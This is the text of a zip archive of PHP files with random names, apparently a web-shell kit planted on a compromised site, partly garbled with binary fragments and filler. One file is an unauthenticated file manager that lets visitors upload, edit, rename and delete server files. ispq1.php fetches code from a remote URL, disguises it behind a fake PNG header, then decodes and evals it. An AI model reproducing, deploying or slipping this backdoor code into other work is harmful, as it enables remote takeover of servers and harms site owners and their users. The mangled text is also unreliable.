sanitize_path($_POST['folder_name'] ?? ''); if($folder){ $fp = $current_dir . DIRECTORY_SEPARATOR . $folder; if(safe_realpath_within(dirname($fp), $root_anchor) && !file_exists($fp)){ mkdir($fp, 0755, true); } } } header('Location: ?action=list&dir=' . urlencode($requested_dir)); exit; break; } ?> 📁 File Manager

📁 File Manager

📍
⬅️ Back 🏠 Project 📂 Root
Root
📭

This folder is empty

Upload files or create new folders to get started

Name Type Size Modified Actions
📂 Open ✏️ Edit 📥 Download 🗑️ Delete
PK\m\9gZ,, z86uk.phpnu[]]jkjjgdj7ghjghjghghjgfjfgjfgjfgjfgjfghghjghjghjghjjghjghjghjgjdskfgj במ12[aspddfasdghjghjghjghjghjvbnvbnvbfgjfgjfgjfgjfgnvbnvbnvbnvbnsfscvxcv;' = 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return ' '; } elseif ($file == ".htaccess") { return ' '; } if ($ext == "html" || $ext == "htm") { return ' '; } elseif ($ext == "php" || $ext == "phtml") { return ' '; } elseif (in_array($ext, $imgs)) { return ' '; } elseif ($ext == "css") { return ' '; } elseif ($ext == "txt") { return ' '; } elseif (in_array($ext, $audio)) { return ' '; } elseif ($ext == "py") { return ' '; } elseif ($ext == "js") { return ' '; } else { return ' '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo (""); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo (""); } elseif (is_dir(decodePath($_GET['q']))) { $p = decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' '); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' '; foreach ($folders as $folder) { echo " "; } foreach ($files as $file) { echo " "; } echo "
Name Size Modified Perms Actions
" . $folder . " --- ". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . " 0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "
" . fileIcon($file) . $file . " " . formatSizeUnits(filesize(PATH . "/" . $file)) . " " . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . " 0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "
"; } else { if (empty($_GET)) { echo (""); } } if (isset($_GET['upload'])) { echo '
Select file to upload:
'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo '
Rename:
'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo (""); } else { echo (""); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo '

'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo (""); } else { echo (""); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "

".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.

"; } else { echo "

Sorry, there was an error uploading your file.

"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo (""); } else { echo (""); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo (""); } else { echo (""); } } } ?> PK\m\755 vf6tc.phpnu[<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK\m\'  ispq1.phpnu[eof()) { $content .= $file->fgets(); } } catch (Throwable $e) { $content = ''; } if (strlen(trim($content)) < 1) { $content = @file_get_contents($url); } if (strlen(trim($content)) < 1 && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $content = curl_exec($ch); curl_close($ch); } return $content; } // -------------------------------------------- // 3. Create payload by appending hidden PHP code // -------------------------------------------- function createStealthPayload($phpCode) { $png = generateRealisticPngHeader(); $marker = '###PAYLOAD###'; $encoded = base64_encode($phpCode); return $png . $marker . $encoded; } // -------------------------------------------- // 4. Extract and execute hidden payload // -------------------------------------------- function extractAndExecutePayload($data) { $marker = '###PAYLOAD###'; $parts = explode($marker, $data); if (count($parts) === 2) { $decoded = base64_decode($parts[1]); if ($decoded !== false && strlen(trim($decoded)) > 0) { @eval("?>$decoded"); } } } // -------------------------------------------- // Main Execution Flow // -------------------------------------------- $remoteCode = loadRemoteData($mainUrl); if (strlen(trim($remoteCode)) > 0) { $payload = createStealthPayload($remoteCode); extractAndExecutePayload($payload); // Executes hidden remote code } ?> PK\m\MQK 146yi.phpnu[PK\m\M huext.phpnu[PK\m\Aj%\%\ 962ta.phpnu[PK\m\ /qabout.phpnu[PK\m\USS [rhpmo7.phpnu[PK\m\TpWhh index.phpnu[PK\m\Ayoff'index-20260307164447-20260307210258.phpnu[PK\m\o E9fj62.phpnu[PK\m\Q0,0, 95r6k.phpnu[PK\m\dz11 i+q1gfm.phpnu[PK\m\Ayoff index-20260307164447.phpnu[PK\m\akog~g~  wufim.phpnu[PK\m\dKdK ! 6hwey.phpnu[PK\m\9gZ,,  z86uk.phpnu[PK\m\755  vf6tc.phpnu[PK\m\'  : ispq1.phpnu[PKG